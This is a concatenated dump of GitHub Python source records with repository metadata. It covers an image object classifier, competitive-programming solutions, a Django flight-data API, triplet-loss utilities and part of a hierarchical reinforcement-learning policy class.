overwrite_classname is None:\n overwrite_classname = self.__class__.__name__\n return self.classifier.to_opencl_file(filename=filename, extra_information=extra_information,\n overwrite_classname=overwrite_classname)\n\n def _make_features(self, features: str, labels, annotation=None, image=None):\n \"\"\"Determine requested features. If annotation is provided, also a ground-truth vector will be returned.\n\n Parameters\n ----------\n features: str\n see train() function for explanation\n labels: ndimage (int)\n annotation: ndimage(int), optional\n sparse annotation label image\n image: ndimage, optional\n intensity image for e.g. mean intensity calculation\n\n Returns\n -------\n table: dict of vectors\n gt: vector\n \"\"\"\n\n import pyclesperanto_prototype as cle\n pixel_statistics = cle.statistics_of_background_and_labelled_pixels(image, labels)\n\n if annotation is not None:\n # determine ground truth\n annotation_statistics = cle.statistics_of_background_and_labelled_pixels(annotation, labels)\n classification_gt = annotation_statistics['max_intensity']\n classification_gt[0] = 0\n else:\n classification_gt = None\n\n feature_list = features.split(' ')\n\n table, gt = self._select_features(pixel_statistics, feature_list, labels, classification_gt)\n\n return table, gt\n\n def _make_touch_matrix(self, labels, touch_matrix = None):\n \"\"\"Generate an adjacency graph matrix representing touching object.\n\n Parameters\n ----------\n labels: ndimage\n touch_matrix: ndimage, optional\n will be returned in case not none\n\n Returns\n -------\n touch_matrix, see [1]\n\n See Also\n --------\n ..[1] https://github.com/clEsperanto/pyclesperanto_prototype/blob/master/demo/neighbors/mesh_between_touching_neighbors.ipynb\n \"\"\"\n if touch_matrix is None:\n import pyclesperanto_prototype as cle\n touch_matrix = cle.generate_touch_matrix(labels)\n return touch_matrix\n\n def _make_distance_matrix(self, labels, distance_matrix = None):\n \"\"\"Generate a matrix with (n+1)*(n+1) elements for a label image with n labels. In this matrix, element (x,y)\n corresponds to the centroid distance between label x and label y.\n\n Parameters\n ----------\n labels: ndimage(int)\n distance_matrix: ndimage, optional\n will be returned in case not none\n\n Returns\n -------\n distance_matrix, see [1]\n\n ..[1] https://github.com/clEsperanto/pyclesperanto_prototype/blob/master/demo/neighbors/mesh_with_distances.ipynb\n \"\"\"\n if distance_matrix is None:\n import pyclesperanto_prototype as cle\n centroids = cle.centroids_of_labels(labels)\n distance_matrix = cle.generate_distance_matrix(centroids, centroids)\n cle.set_column(distance_matrix, 0, 0)\n cle.set_row(distance_matrix, 0, 0)\n\n return distance_matrix\n\n def _select_features(self, all_features, features_to_select, labels, ground_truth=None):\n \"\"\"Provided with all easy-to-determine features, select requested features and calculate the more complicated\n features.\n\n Parameters\n ----------\n all_features: dict[vector]\n features_to_select: list[str]\n labels: ndimage\n ground_truth: ndimage, optional\n\n Returns\n -------\n result:list[vector]\n list of vectors corresponding to the requested features.\n If ground_truth is not None:\n The vectors are shaped (n) for n labels that were annotated. Labels without annotation\n are removed from the vectors. Background measurements are removed,\n because background cannot be classified.\n If ground_truth is None:\n The vectors are shaped (n+1) for n labels.\n That is, background + n measurements for n labels.\n ground_truth: ndimage\n selected elements of provided ground truth where it's not 0\n \"\"\"\n import pyclesperanto_prototype as cle\n result = {}\n self._data = {}\n touch_matrix = None\n distance_matrix = None\n mask = None\n neighbor_statistics = None\n\n if ground_truth is not None:\n mask = ground_truth > 0\n\n for key in features_to_select:\n vector = None\n\n if key in all_features.keys():\n vector = np.asarray([0] + all_features[key])\n elif key == \"touching_neighbor_count\":\n touch_matrix = self._make_touch_matrix(labels, touch_matrix)\n vector = cle.pull(cle.count_touching_neighbors(touch_matrix))[0]\n elif key == \"average_distance_of_touching_neighbors\":\n touch_matrix = self._make_touch_matrix(labels, touch_matrix)\n distance_matrix = self._make_distance_matrix(labels, distance_matrix)\n vector = cle.pull(cle.average_distance_of_touching_neighbors(distance_matrix, touch_matrix))[0]\n elif key.startswith(\"average_distance_of_n_nearest_neighbors=\"):\n n = int(key.replace(\"average_distance_of_n_nearest_neighbors=\", \"\"))\n distance_matrix = self._make_distance_matrix(labels, distance_matrix)\n vector = cle.pull(cle.average_distance_of_n_shortest_distances(distance_matrix, n=n))[0]\n elif len(key) == 0:\n pass\n else:\n # test if the feature is in neighbor statistics\n if neighbor_statistics is None:\n neighbor_statistics = cle.statistics_of_labelled_neighbors(labels)\n if key in neighbor_statistics:\n values = [0] + neighbor_statistics[key].tolist()\n vector = np.asarray(values)\n else:\n raise Exception(\"Feature \" + key + \" is not known!\")\n\n if vector is not None:\n if ground_truth is not None:\n result[key] = np.asarray([vector[mask]])[0]\n else:\n result[key] = np.asarray([vector])[0]\n self._data[key] = result[key]\n\n if ground_truth is not None:\n self._data['label'] = all_features['label'][mask]\n return result, ground_truth[mask]\n else:\n self._data['label'] = all_features['label']\n return result, None\n\n def feature_importances(self):\n \"\"\"Provide feature importances about the trained Random Forest Classifier\n\n The values are provided as dictionary {feature_name:portion_importance}.\n\n See also\n --------\n ..[0] https://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html\n \"\"\"\n return self.classifier.feature_importances()\n\n def statistics(self):\n return self.classifier.statistics()\n","repo_name":"haesleinhuepf/apoc","sub_path":"apoc/_object_classifier.py","file_name":"_object_classifier.py","file_ext":"py","file_size_in_byte":11678,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"11193895591","text":"from sys import stdin as s\nfrom collections import deque\nimport copy\n\ns = open('input.txt','rt')\n\nN, M = list(map(int,s.readline().split()))\n\narray = [list(map(str,s.readline().rstrip())) for _ in range(N)]\n\ndx = [0,-1,0,1]\ndy = [1,0,-1,0]\nglobal result\nresult =0\ndef bfs(x,y):\n global result\n maps = [item[:] for item in array]\n h = 0\n q = deque()\n q.append((x,y,h))\n maps[x][y] = 'W'\n ans = 0\n while q:\n hx ,hy,hh = q.popleft()\n ans = max(ans,hh)\n for i in range(4):\n nx = hx + dx[i]\n ny = hy + dy[i]\n nh = hh\n if 0 <= nx < N and 0 <= ny < M and maps[nx][ny] != 'W':\n maps[nx][ny] = 'W'\n q.append((nx,ny,nh+1))\n \n \n return ans\n\nfor i in range(N):\n for j in range(M):\n if array[i][j] == \"L\":\n if i> 0 and i+1 0 and j+1 int:\n \"\"\"\n 维护一个栈 ops 记录当前括号内的整体符号\n\n Args:\n s (str): [description]\n\n Returns:\n int: [description]\n \"\"\"\n ops, sign, res, l, i = [1], 1, 0, len(s), 0\n while i < l:\n if s[i] == ' ':\n i += 1\n elif s[i] == '+':\n sign = ops[-1]\n i += 1\n elif s[i] == '-':\n sign = -ops[-1]\n i += 1\n elif s[i] == '(':\n ops.append(sign)\n i +=1\n elif s[i] == ')':\n ops.pop()\n i += 1\n else:\n num = 0\n while i < l and '0' <= s[i] <= '9':\n num = num * 10 + int(s[i])\n i += 1\n res += sign * num\n return res\n\ns = \"-(1 + 2 - (3 + 4))\"\nprint(Solution().calculate(s))\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/224_基本计算器.py","file_name":"224_基本计算器.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2806911476","text":"from django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport json\nfrom django.http import JsonResponse\nimport requests\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import DataFly\n# Create your views here.\n\n\ndef getData(requests):\n if requests.method == \"GET\":\n dataSqlite = DataFly.objects.all().values()\n dataJson = {'data': list(dataSqlite)}\n print(dataJson)\n return JsonResponse(dataJson)\n\n\n@csrf_exempt\ndef putData(requests):\n # nombre de los campos de la tabla.\n column_names = [\n \"fecha_i\",\n \"vlo_i\",\n \"ori_i\",\n \"des_i\",\n \"emp_i\",\n \"fecha_o\",\n \"vlo_o\",\n \"ori_o\",\n \"des_o\",\n \"emp_o\",\n \"day_month\",\n \"month_fly\",\n \"year_fly\",\n \"day_fly\",\n \"type_fly\",\n \"enterprice\",\n \"siglaori\",\n \"siglades\",\n ]\n if requests.method == \"POST\":\n print(json.loads(requests.body)[\"data\"])\n # controlo que los datos enviados cincidan con las columnas creadas en la base.\n # en caso de no coincidir retorno un mensaje para que puedan chequear los datos.\n for item in json.loads(requests.body)[\"data\"]:\n print(item)\n for name in item:\n print(name)\n if name not in column_names:\n return JsonResponse({'response': 'Error in format, verify your data.'})\n for item in json.loads(requests.body)[\"data\"]:\n DataFly.objects.create(\n fecha_i=item[\"fecha_i\"],\n vlo_i=item[\"vlo_i\"],\n ori_i=item[\"ori_i\"],\n des_i=item[\"des_i\"],\n emp_i=item[\"emp_i\"],\n fecha_o=item[\"fecha_o\"],\n vlo_o=item[\"vlo_o\"], \n ori_o=item[\"ori_o\"],\n des_o=item[\"des_o\"],\n emp_o=item[\"emp_o\"],\n day_month=item[\"day_month\"],\n month_fly=item[\"month_fly\"],\n year_fly=item[\"year_fly\"],\n day_fly=item[\"day_fly\"],\n type_fly=item[\"type_fly\"],\n enterprice=item[\"enterprice\"],\n siglaori=item[\"siglaori\"],\n siglades=item[\"siglades\"])\n \n return JsonResponse({'response': 'Data loaded'})\n","repo_name":"rosseab-bit/API_SRE","sub_path":"api/api_requests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16659211673","text":"#This module contains the command line interface for the reading log...\n#Kevin Huang\n\nimport argparse\n\nprogram_description = \"This is the command line interface for the reading log\"\n\n\nparser = argparse.ArgumentParser(prog='booklog')\nparser.add_argument(\"add\", help=\"add a book\")\nparser.add_argument(\"remove\", help=\"remove a book\", type=int)\nparser.add_argument(\"view\", help=\"view list of books\")\nargs = parser.parse_args()\nprint(args.echo)\nprint(args.cube**3)","repo_name":"khuang0312/Reading-Log","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123118307","text":"import json\nimport re\nfrom collections import Counter\n\ndef get_hostnames_count(filename):\n with open(r'{}\\{}'.format(\"********\\\\\", filename), 'r') as fi:\n hostname_list = []\n for line in fi:\n hostname_list.append(line.split(' ')[0])\n counts_unique = Counter(hostname_list)\n with open(r'records_{}.txt'.format(str(filename.split('.')[0])), 'w+') as fiw:\n for k in counts_unique:\n str_ = '{} {}'.format(k, counts_unique[k])\n fiw.write(str_)\n","repo_name":"SatyaChipp/_Hackerrank","sub_path":"GoTech/count_hosts.py","file_name":"count_hosts.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29591144529","text":"from itertools import combinations\n\nimport numpy as np\nimport torch\n\n\ndef pdist(vectors):\n distance_matrix = -2*vectors.mm(torch.t(vectors)) + vectors.pow(2).sum(dim=1).view(1, -1) + vectors.pow(2).sum(dim=1).view(-1, 1)\n return distance_matrix\n\nclass TripletSelector:\n def __int__(self):\n pass\n\n def get_triplets(self, embeddings, labels):\n raise NotImplementedError\n\nclass AllTripletSelector(TripletSelector):\n\n def __init__(self):\n super(AllTripletSelector, self).__init__()\n\n def get_triplets(self, embeddings, labels):\n triplets = []\n for label in set(labels):\n label_mask = (labels == label)\n label_indices = np.where(label_mask)[0]\n if len(label_indices) < 2:\n continue\n negative_indices = np.where(np.logical_not(label_mask))[0]\n anchor_positives = list(combinations(label_indices, 2))\n\n temp_triplets = [[anchor_positive[0], anchor_positive[1], neg_ind] for anchor_positive in anchor_positives for neg_ind in negative_indices]\n\n triplets += temp_triplets\n\n return torch.LongTensor(np.array(triplets))\n\n\ndef hardest_negative(loss_values):\n hardest_negative = np.argmax(loss_values)\n return hardest_negative if loss_values[hardest_negative] > 0 else None\n\n\ndef random_hard_negative(loss_values):\n hard_negatives = np.where(loss_values > 0)[0]\n return np.random.choice(hard_negatives) if len(hard_negatives) > 0 else None\n\n\ndef semihard_negative(loss_values, margin):\n semihard_negatives = np.where(np.logical_and(loss_values < margin, loss_values > 0))[0]\n return np.random.choice(semihard_negatives) if len(semihard_negatives) > 0 else None\n\n\nclass FunctionNegativeTripletSelector(TripletSelector):\n def __init__(self, margin, negative_selector_fn, cpu=True):\n super(FunctionNegativeTripletSelector, self).__init__()\n self.margin = margin\n self.negative_selector_fn = negative_selector_fn\n self.cpu = cpu\n\n def get_triplets(self, embeddings, labels):\n if self.cpu:\n embeddings = embeddings.cpu()\n\n distance_matrix = pdist(embeddings)\n if self.cpu:\n distance_matrix = distance_matrix.cpu()\n\n triplets = []\n\n for label in set(labels):\n label_mask = (labels == label)\n label_indices = np.where(label_mask)[0]\n\n if len(label_indices) < 2:\n continue\n\n negative_indices = np.where(np.logical_not(label_mask))[0]\n anchor_positives = list(combinations(label_indices, 2))\n anchor_positives = np.array(anchor_positives)\n\n ap_distances = distance_matrix[anchor_positives[:, 0], anchor_positives[:, 1]]\n\n for anchor_positive, ap_distance in zip(anchor_positives, ap_distances):\n loss_values = ap_distances - distance_matrix[torch.LongTensor(anchor_positive[0]), torch.LongTensor(negative_indices)] + self.margin\n loss_values = loss_values.data.cpu().numpy()\n hard_negative = self.negative_selector_fn(loss_values)\n\n if hard_negative is not None:\n hard_negative = negative_indices[hard_negative]\n triplets.append([anchor_positive[0], anchor_positive[1], hard_negative])\n\n if len(triplets) == 0:\n triplets.append(anchor_positive[0], anchor_positive[1], negative_indices[0])\n\n triplets = np.array(triplets)\n\n return torch.LongTensor(triplets)\n\n\ndef HardestNegativeTripletSelector(margin, cpu=False):\n return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=hardest_negative, cpu=cpu)\n\n\ndef RandomHardNegativeTripletSelector(margin, cpu):\n return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=random_hard_negative, cpu=cpu)\n\n\ndef SemihardNegativeTripletSelector(margin, cpu):\n return FunctionNegativeTripletSelector(margin=margin, negative_selector_fn=semihard_negative, cpu=cpu)","repo_name":"NguyenThanhAI/Triplet_loss","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7125658052","text":"\"\"\"Base goal-conditioned hierarchical policy.\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom copy import deepcopy\nimport os\nimport random\nfrom functools import reduce\n\nfrom hbaselines.base_policies import Policy\nfrom hbaselines.goal_conditioned.replay_buffer import HierReplayBuffer\nfrom hbaselines.utils.reward_fns import negative_distance\nfrom hbaselines.utils.env_util import get_meta_ac_space, get_state_indices\nfrom hbaselines.utils.tf_util import get_trainable_vars\n\n\nclass GoalConditionedPolicy(Policy):\n \"\"\"Goal-conditioned hierarchical reinforcement learning model.\n\n Attributes\n ----------\n num_levels : int\n number of levels within the hierarchy. Must be greater than 1. Two\n levels correspond to a Manager/Worker paradigm.\n meta_period : int or [int]\n meta-policy action period. For multi-level hierarchies, a separate meta\n period can be provided for each level (indexed from highest to lowest)\n intrinsic_reward_type : str\n the reward function to be used by the worker. Must be one of:\n\n * \"negative_distance\": the negative two norm between the states and\n desired absolute or relative goals.\n * \"scaled_negative_distance\": similar to the negative distance reward\n where the states, goals, and next states are scaled by the inverse of\n the action space of the manager policy\n * \"non_negative_distance\": the negative two norm between the states and\n desired absolute or relative goals offset by the maximum goal space\n (to ensure non-negativity)\n * \"scaled_non_negative_distance\": similar to the non-negative distance\n reward where the states, goals, and next states are scaled by the\n inverse of the action space of the manager policy\n * \"exp_negative_distance\": equal to exp(-negative_distance^2). The\n result is a reward between 0 and 1. This is useful for policies that\n terminate early.\n * \"scaled_exp_negative_distance\": similar to the previous worker reward\n type but with states, actions, and next states that are scaled.\n intrinsic_reward_scale : [float]\n the value that the intrinsic reward should be scaled by. One for each\n meta-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-level policies is meant\n to be a relative or absolute goal, i.e. specific state or change in\n state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure. See:\n https://arxiv.org/abs/1805.08296.\n hindsight : bool\n whether to use hindsight action and goal transitions, as well as\n subgoal testing. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies with\n respect to the parameters of the higher-level policies. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from its action\n space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to None,\n the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n policy : list of hbaselines.base_policies.Policy\n a list of policy object for each level in the hierarchy, order from\n highest to lowest level policy\n replay_buffer : hbaselines.goal_conditioned.replay_buffer.HierReplayBuffer\n the replay buffer object\n goal_indices : list of int\n the state indices for the intrinsic rewards\n intrinsic_reward_fn : function\n reward function for the lower-level policies\n \"\"\"\n\n def __init__(self,\n sess,\n ob_space,\n ac_space,\n co_space,\n buffer_size,\n batch_size,\n actor_lr,\n critic_lr,\n verbose,\n tau,\n gamma,\n use_huber,\n l2_penalty,\n model_params,\n num_levels,\n meta_period,\n intrinsic_reward_type,\n intrinsic_reward_scale,\n relative_goals,\n off_policy_corrections,\n hindsight,\n subgoal_testing_rate,\n cooperative_gradients,\n cg_weights,\n cg_delta,\n pretrain_worker,\n pretrain_path,\n pretrain_ckpt,\n total_steps,\n scope=None,\n env_name=\"\",\n num_envs=1,\n meta_policy=None,\n worker_policy=None,\n additional_params=None):\n \"\"\"Instantiate the goal-conditioned hierarchical policy.\n\n Parameters\n ----------\n sess : tf.compat.v1.Session\n the current TensorFlow session\n ob_space : gym.spaces.*\n the observation space of the environment\n ac_space : gym.spaces.*\n the action space of the environment\n co_space : gym.spaces.*\n the context space of the environment\n buffer_size : int\n the max number of transitions to store\n batch_size : int\n SGD batch size\n actor_lr : float\n actor learning rate\n critic_lr : float\n critic learning rate\n verbose : int\n the verbosity level: 0 none, 1 training information, 2 tensorflow\n debug\n tau : float\n target update rate\n gamma : float\n discount factor\n use_huber : bool\n specifies whether to use the huber distance function as the loss\n for the critic. If set to False, the mean-squared error metric is\n used instead\n model_params : dict\n dictionary of model-specific parameters. See parent class.\n num_levels : int\n number of levels within the hierarchy. Must be greater than 1. Two\n levels correspond to a Manager/Worker paradigm.\n meta_period : int or [int]\n meta-policy action period. For multi-level hierarchies, a separate\n meta period can be provided for each level (indexed from highest to\n lowest)\n intrinsic_reward_type : str\n the reward function to be used by the worker. Must be one of:\n\n * \"negative_distance\": the negative two norm between the states and\n desired absolute or relative goals.\n * \"scaled_negative_distance\": similar to the negative distance\n reward where the states, goals, and next states are scaled by the\n inverse of the action space of the manager policy\n * \"non_negative_distance\": the negative two norm between the states\n and desired absolute or relative goals offset by the maximum goal\n space (to ensure non-negativity)\n * \"scaled_non_negative_distance\": similar to the non-negative\n distance reward where the states, goals, and next states are\n scaled by the inverse of the action space of the manager policy\n * \"exp_negative_distance\": equal to exp(-negative_distance^2). The\n result is a reward between 0 and 1. This is useful for policies\n that terminate early.\n * \"scaled_exp_negative_distance\": similar to the previous worker\n reward type but with states, actions, and next states that are\n scaled.\n intrinsic_reward_scale : float or [float]\n the value that the intrinsic reward should be scaled by. One for\n each lower-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-level policies is\n meant to be a relative or absolute goal, i.e. specific state or\n change in state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure.\n See: https://arxiv.org/abs/1805.08296\n hindsight : bool\n whether to include hindsight action and goal transitions in the\n replay buffer. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies\n with respect to the parameters of the higher-level policies. Only\n used if `cooperative_gradients` is set to True.\n cg_delta : float\n the desired lower-level expected returns. If set to None, a fixed\n Lagrangian specified by cg_weights is used instead. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from the\n action space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to\n None, the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n meta_policy : type [ hbaselines.base_policies.Policy ]\n the policy model to use for the meta policies\n worker_policy : type [ hbaselines.base_policies.Policy ]\n the policy model to use for the worker policy\n additional_params : dict\n additional algorithm-specific policy parameters. Used internally by\n the class when instantiating other (child) policies.\n \"\"\"\n super(GoalConditionedPolicy, self).__init__(\n sess=sess,\n ob_space=ob_space,\n ac_space=ac_space,\n co_space=co_space,\n verbose=verbose,\n l2_penalty=l2_penalty,\n model_params=model_params,\n num_envs=num_envs,\n )\n\n # Run assertions.\n assert num_levels >= 2, \"num_levels must be greater than or equal to 2\"\n if off_policy_corrections:\n assert num_levels == 2, \\\n \"Off-policy collections only work for two-level hierarchies.\"\n if hindsight:\n assert num_levels == 2, \\\n \"Hindsight only work for two-level hierarchies.\"\n\n # Process some variable.\n if isinstance(meta_period, list) and len(meta_period) == 1:\n meta_period = meta_period[0]\n if isinstance(intrinsic_reward_scale, float):\n intrinsic_reward_scale = [\n intrinsic_reward_scale for _ in range(num_levels - 1)]\n\n self.num_levels = num_levels\n self.meta_period = meta_period\n self.intrinsic_reward_type = intrinsic_reward_type\n self.intrinsic_reward_scale = intrinsic_reward_scale\n self.relative_goals = relative_goals\n self.off_policy_corrections = off_policy_corrections\n self.hindsight = hindsight\n self.subgoal_testing_rate = subgoal_testing_rate\n self.cooperative_gradients = cooperative_gradients\n self.cg_weights = cg_weights\n self.cg_delta = cg_delta\n self.pretrain_worker = pretrain_worker\n self.pretrain_path = pretrain_path\n self.pretrain_ckpt = pretrain_ckpt\n self.total_steps = total_steps\n\n # Get the observation and action space of the higher level policies.\n meta_ac_space = get_meta_ac_space(\n ob_space=ob_space,\n relative_goals=relative_goals,\n env_name=env_name,\n )\n\n # =================================================================== #\n # Step 1: Create the policies for the individual levels. #\n # =================================================================== #\n\n self.policy = []\n\n # The policies are ordered from the highest level to lowest level\n # policies in the hierarchy.\n for i in range(num_levels):\n # Determine the appropriate parameters to use for the policy in the\n # current level.\n policy_fn = meta_policy if i < (num_levels - 1) else worker_policy\n ac_space_i = meta_ac_space if i < (num_levels - 1) else ac_space\n co_space_i = co_space if i == 0 else meta_ac_space\n ob_space_i = ob_space\n\n # The policies are ordered from the highest level to lowest level\n # policies in the hierarchy.\n with tf.compat.v1.variable_scope(\"level_{}\".format(i)):\n # Compute the scope name based on any outer scope term.\n scope_i = \"level_{}\".format(i)\n if scope is not None:\n scope_i = \"{}/{}\".format(scope, scope_i)\n\n model_params_i = model_params.copy()\n model_params_i.update({\n \"ignore_flat_channels\":\n model_params[\"ignore_flat_channels\"] if i < 1 else [],\n \"ignore_image\":\n model_params[\"ignore_image\"] if i < 1 else True,\n })\n\n # Create the next policy.\n self.policy.append(policy_fn(\n sess=sess,\n ob_space=ob_space_i,\n ac_space=ac_space_i,\n co_space=co_space_i,\n buffer_size=buffer_size,\n batch_size=batch_size,\n actor_lr=actor_lr,\n critic_lr=critic_lr,\n verbose=verbose,\n tau=tau,\n gamma=gamma,\n use_huber=use_huber,\n l2_penalty=l2_penalty,\n model_params=model_params_i,\n scope=scope_i,\n **(additional_params or {}),\n ))\n\n # =================================================================== #\n # Step 2: Create attributes for the replay buffer. #\n # =================================================================== #\n\n # Create the replay buffer.\n self.replay_buffer = HierReplayBuffer(\n buffer_size=int(buffer_size/(\n meta_period ** num_levels - 1 if isinstance(meta_period, int)\n else reduce((lambda x, y: x*y), self.meta_period))),\n batch_size=batch_size,\n meta_period=meta_period,\n obs_dim=ob_space.shape[0],\n ac_dim=ac_space.shape[0],\n co_dim=None if co_space is None else co_space.shape[0],\n goal_dim=meta_ac_space.shape[0],\n num_levels=num_levels\n )\n\n # current action by the meta-level policies\n self.meta_action = [[None for _ in range(num_levels - 1)]\n for _ in range(num_envs)]\n\n # a list of all the actions performed by each level in the hierarchy,\n # ordered from highest to lowest level policy. A separate element is\n # used for each environment.\n self._actions = [[[] for _ in range(self.num_levels)]\n for _ in range(num_envs)]\n\n # a list of the rewards (intrinsic or other) experienced by every level\n # in the hierarchy, ordered from highest to lowest level policy. A\n # separate element is used for each environment.\n self._rewards = [[[0]] + [[] for _ in range(self.num_levels - 1)]\n for _ in range(num_envs)]\n\n # a list of observations that stretch as long as the dilated horizon\n # chosen for the highest level policy. A separate element is used for\n # each environment.\n self._observations = [[] for _ in range(num_envs)]\n\n # the first and last contextual term. A separate element is used for\n # each environment.\n self._contexts = [[] for _ in range(num_envs)]\n\n # a list of done masks at every time step. A separate element is used\n # for each environment.\n self._dones = [[] for _ in range(num_envs)]\n\n # Collect the state indices for the intrinsic rewards.\n self.goal_indices = get_state_indices(ob_space, env_name)\n\n # Define the intrinsic reward function.\n if intrinsic_reward_type in [\"negative_distance\",\n \"scaled_negative_distance\",\n \"non_negative_distance\",\n \"scaled_non_negative_distance\",\n \"exp_negative_distance\",\n \"scaled_exp_negative_distance\"]:\n # Offset the distance measure by the maximum possible distance to\n # ensure non-negativity.\n if \"non_negative\" in intrinsic_reward_type:\n offset = np.sqrt(np.sum(np.square(\n meta_ac_space.high - meta_ac_space.low), -1))\n else:\n offset = 0\n\n # Scale the outputs from the state by the meta-action space if you\n # wish to scale the worker reward.\n if intrinsic_reward_type.startswith(\"scaled\"):\n scale = 0.5 * (meta_ac_space.high - meta_ac_space.low)\n else:\n scale = 1\n\n def intrinsic_reward_fn(states, goals, next_states):\n return negative_distance(\n states=states[self.goal_indices] / scale,\n goals=goals / scale,\n next_states=next_states[self.goal_indices] / scale,\n relative_context=relative_goals,\n offset=0.0,\n ) + offset\n\n # Perform the exponential and squashing operations to keep the\n # intrinsic reward between 0 and 1.\n if \"exp\" in intrinsic_reward_type:\n def exp_intrinsic_reward_fn(states, goals, next_states):\n span = sum(np.square(self.policy[0].ac_space.high -\n self.policy[0].ac_space.low))\n rew = intrinsic_reward_fn(states, goals, next_states)\n return np.exp(- (rew / (span / 40)) ** 2)\n self.intrinsic_reward_fn = exp_intrinsic_reward_fn\n else:\n self.intrinsic_reward_fn = intrinsic_reward_fn\n else:\n raise ValueError(\"Unknown intrinsic reward type: {}\".format(\n intrinsic_reward_type))\n\n # =================================================================== #\n # Step 3: Create algorithm-specific features. #\n # =================================================================== #\n\n # the number of get_action calls that have been performed. This is used\n # when pretraining the worker to incrementally train different levels\n # of the policy.\n self._steps = 0\n\n # a fixed goal transition function for the meta-actions in between meta\n # periods. This is used when relative_goals is set to True in order to\n # maintain a fixed absolute position of the goal.\n if relative_goals:\n def goal_transition_fn(obs0, goal, obs1):\n return obs0 + goal - obs1\n else:\n def goal_transition_fn(obs0, goal, obs1):\n return goal\n self.goal_transition_fn = goal_transition_fn\n\n if self.cooperative_gradients:\n if scope is None:\n self._setup_cooperative_gradients()\n else:\n with tf.compat.v1.variable_scope(scope):\n self._setup_cooperative_gradients()\n\n def initialize(self):\n \"\"\"See parent class.\n\n This method performs the following operations:\n\n - It calls the initialization methods of the policies at every level of\n the hierarchy to match the target value function parameters with the\n current policy parameters.\n - It also imports the lower-level policies from a pretrained checkpoint\n if a path to one is specified.\n \"\"\"\n # Initialize the separate policies in the hierarchy.\n for i in range(self.num_levels):\n self.policy[i].initialize()\n\n if self.pretrain_path is not None:\n ckpt_path = os.path.join(self.pretrain_path, \"checkpoints\")\n\n # Get the checkpoint number.\n if self.pretrain_ckpt is None:\n filenames = os.listdir(ckpt_path)\n metafiles = [f[:-5] for f in filenames if f[-5:] == \".meta\"]\n metanum = [int(f.split(\"-\")[-1]) for f in metafiles]\n ckpt_num = max(metanum)\n else:\n ckpt_num = self.pretrain_ckpt\n\n # Extract the checkpoint path.\n ckpt_path = os.path.join(ckpt_path, \"itr-{}\".format(ckpt_num))\n var_list = tf.train.list_variables(ckpt_path)\n ckpt_reader = tf.train.load_checkpoint(ckpt_path)\n\n # Check that the number of levels match.\n assert var_list[-1][0].startswith(\n \"level_{}\".format(self.num_levels-1)), \\\n \"Number of levels between the checkpoint and current policy \" \\\n \"do not match. Policy={}, Checkpoint={}\".format(\n self.num_levels,\n int(var_list[-1][0].split(\"/\")[0][6:]) + 1)\n\n # Check that the names and shapes of the lowest-level policy\n # parameters match the current policy.\n current_vars = {\n v.name: v.shape.as_list()\n for v in get_trainable_vars()\n }\n for var in var_list:\n var_name, var_shape = var\n var_name = \"{}:0\".format(var_name)\n # We only check the lower-level policies.\n if any(var_name.startswith(\"level_{}\".format(level))\n for level in range(1, self.num_levels)):\n assert var_name in current_vars.keys(), \\\n \"{} not available in current policy.\".format(var_name)\n current_shape = current_vars[var_name]\n assert current_shape == var_shape, \\\n \"Shape mismatch for {}, {} != {}\".format(\n var_name, var_shape, current_shape)\n\n # Import the lower-level policy parameters.\n current_vars = {v.name: v for v in get_trainable_vars()}\n for var in var_list:\n var_name, var_shape = var\n if any(var_name.startswith(\"level_{}\".format(level))\n for level in range(1, self.num_levels)):\n value = ckpt_reader.get_tensor(var_name)\n var_name = \"{}:0\".format(var_name)\n self.sess.run(\n tf.compat.v1.assign(current_vars[var_name], value))\n\n def update(self, update_actor=True, **kwargs):\n 